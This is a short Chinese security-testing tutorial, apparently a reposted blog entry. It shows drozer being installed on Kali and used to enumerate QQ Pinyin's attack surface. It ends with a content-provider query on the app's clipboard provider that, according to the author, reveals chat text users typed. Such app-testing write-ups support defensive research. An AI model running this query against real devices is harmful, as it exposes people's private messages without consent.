实战drozer测试XX输入法数据泄露

2017-01-12 10:04:50来源:oschina作者:i春秋学院人点击

0X00前言


一直都喜欢app检测,除了喜欢利用自动化检测平台检测app,还会使用mobsf和drozer,今天就重点说下drozer


0X01环境安装 环境准备:kali2.0 vm版本虚拟机nexus6


手机安装drozer agent,并开启,记录下ip 192.168.168.106


dpkg -i /root/Desktop/drozer_2.3.4.deb

安装drozer


apt-get install python-protobuf
dpkg -i /root/Desktop/drozer_2.3.4.deb

依赖python-protobuf 安装依赖,再次安装


drozer

安装完毕,连接手机


drozer console connect --server 192.168.168.106:31415


run app.package.list

扫描手机安装的app


run app.package.info -a com.tencent.qqpinyin

查看qq输入法包的信息qq.tencent.qqpinyin5.4.1


run app.package.attacksurface com.tencent.qqpinyin

识别攻击面 官方文档中的数据泄露测试章节 数据泄露扫描


run scanner.provider.finduris -a com.tencent.qqpinyin


run app.provider.query content://com.tencent.qqinput.cliboardprovider

可以看到qq输入法输过的聊天记录


更多安全技术、精品好文、白帽黑客大佬尽在:http://bbs.ichunqiu.com/portal.php

最新文章

123

最新摄影

微信扫一扫

第七城市微信公众平台